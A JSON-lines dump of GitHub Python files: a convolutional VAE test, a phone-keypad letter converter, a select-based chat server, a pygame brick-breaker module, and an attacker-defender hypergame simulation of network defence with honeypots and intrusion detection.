latent_size)\n\n            de_conv_2d_model = TestConvVAE.__create_de_2d_conv_model('DeConv2d', output_channels, in_channels, input_channels)\n            conv_vae_model = ConvVAEModel('Conv LinearVAE', conv_2d_model, de_conv_2d_model, variational_block)\n\n            lr = 0.001\n            momentum = 0.9\n            epochs = 20\n            optim_label = 'adam'\n            batch_size = 14\n            early_stop_patience = 3\n            loss_function = torch.nn.BCELoss(reduction='sum')\n            hyper_params = HyperParams(lr, momentum, epochs, optim_label, batch_size, early_stop_patience, loss_function)\n\n            # Step 3: Load data set\n            train_loader, test_loader = TestConvVAE.__load_data(batch_size)\n            conv_vae = ConvVAE(conv_vae_model, hyper_params, None)\n            print(repr(conv_vae))\n            conv_vae._train_and_eval(train_loader, test_loader)\n        except Exception as e:\n            self.fail(str(e))\n\n    # -------------- Supporting methods -------------------\n\n    @staticmethod\n    def __create_2d_conv_model(model_id: str, input_channels: int, in_channels: int, output_channels: int) -> ConvModel:\n        conv_neural_block_1 = TestConvVAE.__create_2d_conv_block(\n            2,\n            input_channels,\n            in_channels,\n            torch.nn.LeakyReLU(0.2),\n            False,\n            0)\n        conv_neural_block_2 = 
TestConvVAE.__create_2d_conv_block(\n 2,\n in_channels,\n in_channels*2,\n torch.nn.LeakyReLU(0.2),\n False,\n 1)\n conv_neural_block_3 = TestConvVAE.__create_2d_conv_block(\n 2,\n in_channels*2,\n output_channels,\n torch.nn.LeakyReLU(0.2),\n False,\n 1)\n return ConvModel(\n model_id,\n 2,\n [conv_neural_block_1, conv_neural_block_2, conv_neural_block_3],\n None)\n\n @staticmethod\n def __create_2d_conv_block(\n dim: int,\n in_channels: int,\n out_channels: int,\n activation: torch.nn.Module,\n batch_norm: bool,\n padding: int) -> ConvNeuralBlock:\n kernel_size = 4\n max_pooling_kernel = -1\n bias = False\n flatten = False\n stride = 2\n return ConvNeuralBlock(\n dim,\n in_channels,\n out_channels,\n kernel_size,\n stride,\n padding,\n batch_norm,\n max_pooling_kernel,\n activation,\n bias,\n flatten)\n\n @staticmethod\n def __create_de_2d_conv_model(model_id: str, in_channels: int, hidden_dim: int, output_size: int) -> DeConvModel:\n de_conv_neural_block_1 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n in_channels,\n hidden_dim * 4,\n torch.nn.ReLU(),\n False,\n 0)\n de_conv_neural_block_2 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n hidden_dim * 4,\n hidden_dim*2,\n torch.nn.ReLU(),\n False,\n 1)\n de_conv_neural_block_3 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n hidden_dim*2,\n output_size,\n torch.nn.Sigmoid(),\n False,\n 1)\n return DeConvModel(model_id, 2, [de_conv_neural_block_1, de_conv_neural_block_2, de_conv_neural_block_3])\n\n @staticmethod\n def __create_2d_de_conv_block(\n dim: int,\n in_channels: int,\n out_channels: int,\n activation: torch.nn.Module,\n batch_norm: bool,\n padding: int) -> DeConvNeuralBlock:\n\n kernel_size = 4\n bias = False\n stride = 2\n return DeConvNeuralBlock(\n dim,\n in_channels,\n out_channels,\n kernel_size,\n stride,\n padding,\n batch_norm,\n activation,\n bias)\n\n @staticmethod\n def __load_data(batch_size: int) -> (DataLoader, DataLoader):\n transform = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)),\n ])\n train_loader = DataLoader(\n MNIST('../../data/', train=True, download=True, transform=transform),\n batch_size=batch_size,\n shuffle=True)\n test_loader = DataLoader(\n MNIST('../../data/', train=False, download=True, transform=transform),\n batch_size=batch_size,\n shuffle=False)\n return train_loader, test_loader\n\n","repo_name":"patrick-nicolas/GenModels","sub_path":"src/autoencoder/test/test_convvae.py","file_name":"test_convvae.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73461466728","text":"def digits2letters(digits):\r\n digits = str(digits)\r\n def loopProcessing(index, string, result):\r\n if index == len(digits):\r\n result.append(string)\r\n return\r\n for letter in dict[digits[index]]:\r\n loopProcessing(index+1, string+letter, result)\r\n\r\n dict = {'0':[''],\r\n '1':[''],\r\n '2':['a','b','c'],\r\n '3':['d','e','f'],\r\n '4':['g','h','i'],\r\n '5':['j','k','l'],\r\n '6':['m','n','o'],\r\n '7':['p','q','r','s'],\r\n '8':['t','u','v'],\r\n '9':['w','x','y','z']\r\n }\r\n result = []\r\n loopProcessing(0, '', result)\r\n print(\"Possible letters are:\", result)\r\n return result\r\n\r\ndigits = input(\"Input your digits to convert to letters: \")\r\nwhile True:\r\n if digits.isdigit():\r\n break\r\n else:\r\n digits = input(\"Please input only digits: 
\")\r\n\r\ndigits2letters(digits)","repo_name":"patrickhohoho/assignments","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6064891465","text":"import socket\nimport select\n\n#select 监听 读 写 错误 所有事件\n\nss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nprint('初始化----------')\n\nss.bind(('10.2.0.104',12332))\n\nss.listen(10)\n\nreadlist =[ss]\nwritelist = []\n\nmsg_dict ={}\nconn_list = [] #存放所有conn链接\nmsg_dict_code = {} #存放消息\n# conn,addr = ss.accept()\nwhile True: #让其一直循环监听\n rlist,wlist,xlist = select.select(readlist,writelist,[])\n\n #监听readlist列表中的事件ss的读 只要右边的readlist读 有事件发生就会向下执行 可监听readlist列表中的所有元素\n #rlist 中只会存在本次 readlist中有事件发生的已经准备好的事件\n #只要rlist wlist xlist中任何一个存在值就会向下执行\n\n for r in rlist:\n if r is ss:\n conn,addr = r.accept()\n conn_list.append(conn)\n readlist.append(conn) #添加事件conn到读事件列表中去,使读能监听ss和conn这两个事件\n\n else:\n msg = r.recv(1024)\n # msg_dict[r.fileno()] = msg #将消息内容放入字典中 只存了这一个的消息\n if len(msg) == 0:\n r.close()\n readlist.remove(r) #若客户端断开链接 则不再监听该conn\n conn_list.remove(r)\n print('{}-----{}'.format(r.fileno(),msg.decode()))\n\n msg = \"编号:{} 信息内容: {}\".format(r.fileno(),msg.decode())\n\n\n for i in conn_list:\n writelist.append(i) #将所有conn放入写监听中\n msg_dict_code[i.fileno()] = msg #将所有相对应的消息存入\n\n for w in wlist:\n msg = msg_dict_code[w.fileno()]\n w.send(msg.encode()) #有写事件发生则发送收到的消息\n del msg_dict_code[w.fileno()] #删除该编号记录的信息\n writelist.remove(w) #将该w事件从监听中移除 不然会一直发送\n","repo_name":"JwangTec/python_resources","sub_path":"python_socket/select1.py","file_name":"select1.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21550204598","text":"import pygame\r\n\r\nglobal screen\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255,255,0)\r\nscreen = None\r\ndef init(scree):\r\n\t\tglobal screen\r\n\t\tscreen = scree\r\n\t\t\r\ndef retangle(rect,color):\r\n\tpygame.draw.rect(screen,color,rect)\r\ndef cirсle(x,y):\r\n\tpygame.draw.circle(screen,WHITE,(x,y),4)\r\n\r\nclass platform():\r\n\tx = 0\r\n\ty = 0\r\n\trect = None\r\n\tdef __init__(self,x,y) -> None:\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(x-30,y-2,60,4)\r\n\tdef draw(self):\r\n\t\tretangle(self.rect,(255, 255, 255))\r\n\tdef move(self,pos):\r\n\t\tx = pos[0]\r\n\t\ty = self.y\r\n\t\tself.rect = pygame.Rect(x-30,y-2,60,4)\r\n\r\nclass wall():\r\n\tx,y =0,0\r\n\trect = None\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect((self.x,self.y),(10,10))\r\n\tdef draw(self):\r\n\t\tpygame.draw.rect(screen,WHITE,self.rect)\r\nclass ball():\r\n\tx,y = 0,0\r\n\trect = None\r\n\tvector = (0.5,-1)\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(self.x,self.y,8,8)\r\n\tdef move(self):\r\n\t\tself.x += self.vector[0]\r\n\t\tself.y += self.vector[1]\r\n\t\tself.rect = pygame.Rect(self.x-4,self.y-4,8,8)\r\n\tdef check_b(self, blocksc):\r\n\t\tblocks = blocksc.copy()\r\n\t\tfor block in blocks:\r\n\t\t\twx = block.rect.x\r\n\t\t\twy = block.rect.y\r\n\t\t\tww = block.rect.width\r\n\t\t\twh = block.rect.height\r\n\t\t\tbx = self.rect.x\r\n\t\t\tby = self.rect.y\r\n\t\t\tif pygame.Rect(wx,wy,1,wh).colliderect(pygame.Rect(bx + 7,by,1,8)) or 
pygame.Rect(wx+ww-1,wy,1,wh).colliderect(pygame.Rect(bx,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\t\t\t\tblocksc.remove(block)\r\n\r\n\t\t\tif pygame.Rect(wx,wy + wh-1,ww,1).colliderect(pygame.Rect(bx,by,8,1)) or pygame.Rect(wx,wy,ww,1).colliderect(pygame.Rect(bx,by + 7,8,1)):\r\n\t\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\t\t\t\tblocksc.remove(block)\r\n\r\n\r\n\t\treturn blocksc\r\n\t\t\t\t\r\n\tdef check_w(self,blocks):\r\n\t\tbx = self.rect.x\r\n\t\tby = self.rect.y\r\n\t\tfor block in blocks:\r\n\t\t\twx = block.rect.x\r\n\t\t\twy = block.rect.y\r\n\t\t\tww = block.rect.width\r\n\t\t\twh = block.rect.height\r\n\r\n\t\t\tif pygame.Rect(wx+ww-1,wy,1,wh).colliderect(pygame.Rect(bx,by,1,8)) or pygame.Rect(wx,wy,1,wh).colliderect(pygame.Rect(bx + 7,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\t\t\t\r\n\t\t\tif pygame.Rect(wx,wy,ww,1).colliderect(pygame.Rect(bx,by + 7,8,1)) or pygame.Rect(wx,wy + wh-1,ww,1).colliderect(pygame.Rect(bx,by,8,1)):\r\n\t\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\t\t\r\n\t\tif pygame.Rect(500,0,1,500).colliderect(pygame.Rect(bx + 7,by,1,8)) or pygame.Rect(0,0,1,500).colliderect(pygame.Rect(bx,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\r\n\t\tif pygame.Rect(0,0,500,1).colliderect(pygame.Rect(bx,by,8,1)):\r\n\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\r\n\t\tif pygame.Rect(0,500,500,1).colliderect(pygame.Rect(bx,by + 7,8,1)):\r\n\t\t\tpygame.quit()\r\n\r\n\r\n\r\n\tdef reverse(self):\r\n\t\tself.vector = (self.vector[0],0-self.vector[1])\r\n\tdef draw(self):\r\n\t\tcircle(self.x,self.y)\r\n\t\t\r\nclass block():\r\n\tx,y =0,0\r\n\trect = None\r\n\trect_obv = None\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(self.x,self.y,10,10)\r\n\t\tself.rect_obv = pygame.Rect(self.x,self.y,9,9)\r\n\tdef draw(self):\r\n\t\tpygame.draw.rect(screen,BLACK,self.rect_obv)\r\n\t\tpygame.draw.rect(screen,GREEN,self.rect)","repo_name":"LightMizu/Arconoid","sub_path":"game/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34841389684","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n# # solve Jupyter runtime error\n# import nest_asyncio\n# nest_asyncio.apply()\n\n\nimport concurrent.futures\nimport multiprocessing\nimport os\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nfrom itertools import count\nimport random\nimport math\nimport copy\nimport time\nimport pickle\n\nfrom graph_function import *\nfrom attacker_function import *\nfrom defender_function import *\nfrom main import display\n\n\nclass game_class:\n    def __init__(self, simulation_id, DD_using, uncertain_scheme, web_data_upper_vul, Iot_upper_vul, Th_risk, _lambda,\n                 mu, SF_thres_1, SF_thres_2, att_detect_UpBod):\n        self.lifetime = 1\n        self.CKC_number = 6\n        self.strategy_number = 8\n        self.DD_using = DD_using\n        self.graph = graph_class(web_data_upper_vul, Iot_upper_vul)\n        self.uncertain_scheme = uncertain_scheme\n        self.att_detect_UpBod = att_detect_UpBod\n        self.attacker = attacker_class(self, self.uncertain_scheme, self.att_detect_UpBod)\n        self.attacker_number = 1\n        self.defender = defender_class(self, self.uncertain_scheme)\n        self.game_over = False\n        self.FN = 10 # False Negative for Beta distribution\n        self.TP = 90 # True Positive\n        self.TN = 99\n        self.FP = 1\n        
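# per-game edge-rewiring probability, consumed by prepare_for_next_game()\n        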
self.rewire_network = 0.01\n # for Experiment Result ⬇️\n self.def_uncertainty_history = []\n self.att_uncertainty_history = []\n self.pre_attacker_number = 0\n self.att_HEU_history = []\n self.def_HEU_history = []\n self.att_strategy_counter = []\n self.def_strategy_counter = []\n self.FPR_history = []\n self.TPR_history = []\n self.att_cost_history = []\n self.def_cost_history = []\n self.def_per_strat_cost = np.zeros((1,8))\n self.def_succ_counter = np.zeros((6,8))\n self.def_fail_counter = np.zeros((6,8))\n self.criticality_hisotry = np.zeros(100000) # np.zeros(10000)\n self.evict_reason_history = np.zeros(2)\n self.SysFail = [False] * 3\n self.att_EU_C = np.zeros(8)\n self.att_EU_CMS = np.zeros(8)\n self.def_EU_C = np.zeros(8)\n self.def_EU_CMS = np.zeros(8)\n self.att_impact = np.zeros(8)\n self.def_impact = np.zeros(8)\n self.att_HEU_DD_IPI = np.zeros(8)\n self.def_HEU_DD_IPI = np.zeros(8)\n self.NIDS_eviction = np.zeros(4) # [# of bad, # of good]\n self.NIDS_Th_risk = Th_risk\n self._lambda = _lambda\n self.mu = mu\n self.SF_thres_1 = SF_thres_1\n self.SF_thres_2 = SF_thres_2\n self.hitting_result = []\n\n def attacker_round(self, simulation_id):\n if display: print(f\"attacker location{self.attacker.location}\")\n if self.game_over:\n print(f\"Sim {simulation_id} GAME OVER\")\n return\n\n self.attacker.observe_opponent(self.defender.CKC_position,\n self.defender.chosen_strategy)\n\n self.attacker.choose_strategy(self.defender.strategy_number,\n self.defender.strat_cost,\n self.defender.impact_record)\n if display:\n print(f\"attacker choose: {self.attacker.chosen_strategy + 1}\")\n attack_result = self.attacker.execute_strategy(\n self.graph.network, self.defender.network, self.defender.P_fake,\n self.attacker.detect_prob)\n self.attacker.update_attribute(self.defender.dec, self._lambda)\n self.graph.update_graph(self.defender.network, self.attacker.network)\n if attack_result:\n self.def_succ_counter[self.attacker.CKC_position, self.defender.chosen_strategy] += 1\n else:\n self.def_fail_counter[self.attacker.CKC_position, self.defender.chosen_strategy] += 1\n if attack_result:\n if (self.attacker.chosen_strategy == 0\n and self.attacker.CKC_position != 0):\n pass # This avoid inside attacker increase stage when Strategy 1 success\n else:\n self.attacker.next_stage()\n else:\n self.attacker.random_moving()\n if display:\n print(f\"attacker move, new location: {self.attacker.location}\")\n\n return attack_result\n\n def defender_round(self):\n self.defender.observe_opponent(self.attacker.impact_record,\n self.attacker.CKC_position,\n self.attacker.chosen_strategy)\n result = self.defender.decide_CKC_posi(self.attacker.detect_prob,\n self.attacker.CKC_position)\n if result:\n if display:\n print(\"defender guess CKC correct\")\n else:\n if display:\n print(\"defender guess CKC wrong\")\n\n self.defender.choose_strategy(self.attacker.chosen_strategy,\n self.attacker.strategy_number,\n self.attacker.strat_cost,\n self.attacker.impact_record)\n if display:\n print(f\"defender choose: {self.defender.chosen_strategy + 1}\")\n success = self.defender.execute_strategy(self.attacker.network,\n self.attacker.detect_prob,\n self.graph,\n self.FN / (self.TP + self.FN),\n self.FP / (self.TN + self.FP), self.NIDS_eviction)\n self.defender.update_attribute(self.attacker.detect_prob, self.mu, self.attacker.impact_record)\n self.graph.update_graph(self.defender.network, self.attacker.network)\n\n def NIDS_detect(self):\n # Warning: False Positive evict too many nodes\n # false negative rate\n 
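# and false-positive rate, both derived from the running Beta-distribution counters TP/FN/TN/FP\n        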
false_neg_prob = self.FN / (self.TP + self.FN)\n false_pos_prob = self.FP / (self.TN + self.FP)\n Th_risk = self.NIDS_Th_risk\n\n # for index in self.graph.network.nodes:\n all_nodes = list(self.graph.network.nodes(data=False))\n experiment_index_record = 0\n for index in all_nodes:\n if is_node_evicted(self.graph.network,\n index): # ignore evicted node for saving time\n continue\n\n # detect is node compromised\n node_is_compromised = False\n if self.graph.network.has_node(index):\n if self.graph.network.nodes[index][\"compromised_status\"]:\n if random.random() > false_neg_prob:\n node_is_compromised = True\n self.defender.network.nodes[index][\"compromised_status\"] = True\n experiment_index_record = 0\n else:\n if display: print(\"False Negative to compromised node\")\n else:\n if random.random() < false_pos_prob:\n if display: print(\"False Positive to good node\")\n node_is_compromised = True\n self.defender.network.nodes[index][\"compromised_status\"] = True\n experiment_index_record = 1\n\n if node_is_compromised:\n # No-DD means NIDS doesn't remain attacker in system\n if not self.DD_using:\n if display: print(f\"Evict node {index}, No DD using\")\n evict_a_node(index, self.graph.network,\n self.defender.network, self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n continue\n if self.graph.network.has_node(index):\n if self.graph.network.nodes[index][\"criticality\"] > Th_risk:\n if display:\n print(f\"Evict node {index}, criticality > Th_risk\")\n evict_a_node(index, self.graph.network,\n self.defender.network,\n self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n continue\n else:\n if is_system_fail(self.graph, [None], self.SF_thres_1, self.SF_thres_2):\n if display:\n print(\n f\"Evict node {index}, compromise cause SF\")\n evict_a_node(index, self.graph.network,\n self.defender.network,\n self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n\n def update_graph(self):\n self.graph.update_graph()\n self.attacker.update_graph()\n self.defender.update_graph()\n\n def prepare_for_next_game(self):\n self.lifetime += 1\n\n # Beta distribution\n if self.graph.using_honeynet:\n self.TP += 5\n self.TN += 5\n\n else:\n if self.defender.chosen_strategy == 4 or self.defender.chosen_strategy == 5 or self.defender.chosen_strategy == 6 or self.defender.chosen_strategy == 7:\n self.TP += 5\n self.TN += 5\n\n # rewire graph\n rewire_network(self.graph.network, self.attacker.network,\n self.defender.network, self.rewire_network)\n\n # reconnect non-evicted node to server or databse\n node_reconnect(self.graph.network, self.attacker.network,\n self.defender.network, self.graph.connect_prob)\n\n # update defender impact\n self.defender.impact_record[\n self.defender.chosen_strategy] = 1 - self.attacker.impact_record[\n self.attacker.chosen_strategy]\n\n # clean honeypot after each game\n if self.graph.using_honeynet:\n clean_honeynet(self.graph.network, self.attacker.network,\n self.defender.network)\n self.graph.using_honeynet = False\n\n # remove honeypot in comrpomised list\n for index in self.attacker.compromised_nodes:\n if not self.graph.network.has_node(index):\n self.attacker.compromised_nodes.remove(index)\n # remove honeypot in collection list\n for index in self.attacker.collection_list:\n if not self.graph.network.has_node(index):\n self.attacker.collection_list.remove(index)\n\n def new_attacker(self, simulation_id):\n self.attacker_number += 1\n print(\n f\"\\033[93m Sim {simulation_id} Creating attacker 
#{self.attacker_number} \\033[0m\"\n )\n # new attacker\n self.attacker = attacker_class(self, self.uncertain_scheme, self.att_detect_UpBod)\n # reset defender\n self.defender.reset_attribute(self.attacker.impact_record,\n self.CKC_number)\n\n def experiment_saving(self):\n self.def_uncertainty_history.append(self.defender.uncertainty)\n self.att_uncertainty_history.append(self.attacker.uncertainty)\n\n # Att/Def HEU\n self.att_HEU_history.append(\n self.attacker.HEU[self.attacker.chosen_strategy])\n self.def_HEU_history.append(\n self.defender.HEU[self.defender.chosen_strategy])\n # Att/Def Strategy\n self.att_strategy_counter.append(self.attacker.chosen_strategy)\n self.def_strategy_counter.append(self.defender.chosen_strategy)\n # FP & TP for ROC curve\n self.FPR_history.append(1 - self.TN /\n (self.TN + self.FP)) # FPR using preset value\n self.TPR_history.append(1 - self.FN / (self.FN + self.TP))\n # Att/Def Cost\n self.att_cost_history.append(\n self.attacker.strat_cost[self.attacker.chosen_strategy])\n self.def_cost_history.append(\n self.defender.strat_cost[self.defender.chosen_strategy])\n def_cost_temp = np.zeros(8)\n def_cost_temp[self.defender.chosen_strategy] = self.defender.strat_cost[self.defender.chosen_strategy]\n\n self.def_per_strat_cost = np.append(self.def_per_strat_cost, np.reshape(def_cost_temp, (1, -1)), axis=0)\n\n\n # Criticality\n criti_list = (np.array(\n list(\n nx.get_node_attributes(self.graph.network,\n \"criticality\").values())) *\n 1000).astype(int)\n for value in criti_list:\n self.criticality_hisotry[value] += 1\n # EU_C & EU_CMS\n self.att_EU_C = np.vstack((self.att_EU_C, self.attacker.EU_C))\n self.att_EU_CMS = np.vstack((self.att_EU_CMS, self.attacker.EU_CMS))\n self.def_EU_C = np.vstack((self.def_EU_C, self.defender.EU_C))\n self.def_EU_CMS = np.vstack((self.def_EU_CMS, self.defender.EU_CMS))\n # attacker/defender impact\n self.att_impact = np.vstack(\n (self.att_impact, self.attacker.impact_record))\n self.def_impact = np.vstack(\n (self.def_impact, self.defender.impact_record))\n # HEU in DD IPI\n self.att_HEU_DD_IPI = np.vstack(\n (self.att_HEU_DD_IPI, self.attacker.HEU))\n self.def_HEU_DD_IPI = np.vstack(\n (self.def_HEU_DD_IPI, self.defender.HEU))\n\n # Hitting Ratio\n hit = False\n att_AHEU_str_index = random.choice(np.where(self.attacker.AHEU == max(self.attacker.AHEU))[0])\n att_DHEU_str_index = random.choice(np.where(self.attacker.att_guess_DHEU == max(self.attacker.att_guess_DHEU))[0])\n\n def_AHEU_str_index = random.choice(np.where(self.defender.def_guess_AHEU == max(self.defender.def_guess_AHEU))[0])\n # def_DHEU_str_index = random.choice(np.where(attacker.defender_HEU == max(attacker.defender_HEU))[0])\n def_DHEU_str_index = random.choice(np.where(self.defender.DHEU == max(self.defender.DHEU))[0])\n if att_AHEU_str_index == def_AHEU_str_index and att_DHEU_str_index == def_DHEU_str_index:\n self.hitting_result.append(True)\n else:\n self.hitting_result.append(False)\n\n\ndef game_start(simulation_id=0,\n DD_using=True,\n uncertain_scheme=True,\n web_data_upper_vul=7,\n Iot_upper_vul=5, Th_risk=0.3, _lambda=1, mu=8, SF_thres_1=1 / 3, SF_thres_2=1 / 2, att_detect_UpBod=0.5):\n print(\n f\"Start Simulation {simulation_id}, DD_using={DD_using}, uncertain_scheme={uncertain_scheme}, web_data_upper_vul={web_data_upper_vul}, Iot_upper_vul={Iot_upper_vul}\"\n )\n np.seterr(divide='ignore',\n invalid='ignore') # for remove divide zero warning\n\n game_continue = True\n\n game = game_class(simulation_id, DD_using, uncertain_scheme,\n 
web_data_upper_vul, Iot_upper_vul, Th_risk, _lambda, mu, SF_thres_1, SF_thres_2, att_detect_UpBod)\n\n while (not game.game_over):\n print(game.lifetime)\n if display:\n print(f\"attacker CKC: {game.attacker.CKC_position + 1}\")\n\n # print(game.lifetime)\n game.defender_round()\n attack_result = game.attacker_round(simulation_id)\n game.experiment_saving()\n game.NIDS_detect()\n att_outside = False\n if game.attacker.location is not None:\n att_outside = is_node_evicted(game.graph.network,\n game.attacker.location)\n\n # Decide whether to create new attacker\n if att_outside:\n game.evict_reason_history[0] += 1\n # check is attacker in honeypot\n att_in_honeypot = False\n if game.attacker.location is not None:\n if game.graph.network.has_node(game.attacker.location):\n if game.graph.network.nodes[\n game.attacker.location][\"type\"] == 3:\n att_in_honeypot = True\n game.evict_reason_history[1] += 1\n reason_box = [None]\n if is_system_fail(game.graph, reason_box, SF_thres_1, SF_thres_2):\n print(f\"Sim {simulation_id} SYSTEM FAIL \\U0001F480\")\n print(f\"Sim {simulation_id} GAME OVER\")\n game.game_over = True\n game.SysFail[reason_box[0]] = True\n game.prepare_for_next_game()\n data_exfil_succ = False\n if attack_result:\n if game.attacker.chosen_strategy == 7:\n data_exfil_succ = True\n print(\"Strategy 8 win !!!\")\n if att_outside or att_in_honeypot or data_exfil_succ:\n game.new_attacker(simulation_id)\n\n # if all-3 node evicted, End simulation\n all_evict_mark = list(\n nx.get_node_attributes(game.graph.network,\n \"evicted_mark\").values())\n if sum(all_evict_mark) >= len(all_evict_mark) - 3:\n print(f\"Sim {simulation_id} All node evicted\")\n game.SysFail[0] = True\n game.game_over = True\n\n if display: draw_graph(game.attacker.network)\n if display: draw_graph(game.graph.network)\n return game\n\n\ndef run_sumulation_fixed_setting(current_scheme, DD_using, uncertain_scheme,\n simulation_time):\n # simulation_time = 100\n\n # start = time.perf_counter()\n\n def_uncertainty_all_result = {}\n att_uncertainty_all_result = {}\n Time_to_SF_all_result = {}\n att_HEU_all_result = {}\n def_HEU_all_result = {}\n att_strategy_count_result = {}\n def_strategy_count_result = {}\n FPR_all_result = {}\n TPR_all_result = {}\n att_cost_all_result = {}\n def_cost_all_result = {}\n criticality_all_result = {}\n evict_reason_all_result = {}\n SysFail_reason = [0] * 3\n att_EU_C_all_result = {}\n att_EU_CMS_all_result = {}\n def_EU_C_all_result = {}\n def_EU_CMS_all_result = {}\n att_impact_all_result = {}\n def_impact_all_result = {}\n att_HEU_DD_IPI_all_result = {}\n def_HEU_DD_IPI_all_result = {}\n NIDS_eviction_all_result = {}\n hitting_probability_all_result = {}\n def_succ_counter_all_result = {}\n def_fail_counter_all_result = {}\n cost_per_strat_allresult = {}\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for i in range(simulation_time):\n future = executor.submit(game_start, i, DD_using,\n uncertain_scheme) # scheme change here\n results.append(future)\n\n index = 0\n for future in results:\n # New Attacker\n Time_to_SF_all_result[index] = future.result().lifetime\n # HEU\n att_HEU_all_result[index] = future.result().att_HEU_history\n def_HEU_all_result[index] = future.result().def_HEU_history\n # Strategy Counter\n att_strategy_count_result[index] = future.result(\n ).att_strategy_counter\n def_strategy_count_result[index] = future.result(\n ).def_strategy_counter\n # Uncertainty\n def_uncertainty_all_result[index] = future.result(\n 
).def_uncertainty_history\n att_uncertainty_all_result[index] = future.result(\n ).att_uncertainty_history\n # TPR & FPR\n FPR_all_result[index] = future.result().FPR_history\n TPR_all_result[index] = future.result().TPR_history\n # Cost\n att_cost_all_result[index] = future.result().att_cost_history\n def_cost_all_result[index] = future.result().def_cost_history\n # Criticality\n criticality_all_result[index] = future.result().criticality_hisotry\n # Evict attacker reason\n evict_reason_all_result[index] = future.result(\n ).evict_reason_history\n # System Fail reason\n if future.result().SysFail[0]:\n SysFail_reason[0] += 1 # [att_strat, system_fail]\n elif future.result().SysFail[1]:\n SysFail_reason[1] += 1\n elif future.result().SysFail[2]:\n SysFail_reason[2] += 1\n # EU_C & EU_CMS\n att_EU_C_all_result[index] = np.delete(future.result().att_EU_C, 0,\n 0)\n att_EU_CMS_all_result[index] = np.delete(\n future.result().att_EU_CMS, 0, 0)\n def_EU_C_all_result[index] = np.delete(future.result().def_EU_C, 0,\n 0)\n def_EU_CMS_all_result[index] = np.delete(\n future.result().def_EU_CMS, 0, 0)\n # attacker & defender impact\n att_impact_all_result[index] = np.delete(\n future.result().att_impact, 0, 0)\n def_impact_all_result[index] = np.delete(\n future.result().def_impact, 0, 0)\n # HEU in DD IPI\n att_HEU_DD_IPI_all_result[index] = np.delete(\n future.result().att_HEU_DD_IPI, 0, 0)\n def_HEU_DD_IPI_all_result[index] = np.delete(\n future.result().def_HEU_DD_IPI, 0, 0)\n # NIDS evict Bad or Good\n NIDS_eviction_all_result[index] = future.result().NIDS_eviction\n # hitting probability for Hypergame Nash Equilibrium\n hitting_probability_all_result[index] = future.result().hitting_result\n # defender success/fail counter\n def_succ_counter_all_result[index] = future.result().def_succ_counter\n def_fail_counter_all_result[index] = future.result().def_fail_counter\n # defender cost per strategy\n cost_per_strat_allresult[index] = future.result().def_per_strat_cost[1:]\n\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n # history of when new attacker created\n os.makedirs(\"data/\" + current_scheme, exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/Time_to_SF.pkl\", \"wb+\")\n pickle.dump(Time_to_SF_all_result, the_file)\n the_file.close()\n\n # HEU\n os.makedirs(\"data/\" + current_scheme + \"/R1\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R1/att_HEU.pkl\", \"wb+\")\n pickle.dump(att_HEU_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R1/def_HEU.pkl\", \"wb+\")\n pickle.dump(def_HEU_all_result, the_file)\n the_file.close()\n\n # Strategy Counter\n os.makedirs(\"data/\" + current_scheme + \"/R2\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R2/att_strategy_counter.pkl\",\n \"wb+\")\n pickle.dump(att_strategy_count_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R2/def_strategy_counter.pkl\",\n \"wb+\")\n pickle.dump(def_strategy_count_result, the_file)\n the_file.close()\n\n # uncertainty\n os.makedirs(\"data/\" + current_scheme + \"/R3\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R3/defender_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R3/attacker_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n\n # TPR & FPR\n os.makedirs(\"data/\" + current_scheme + 
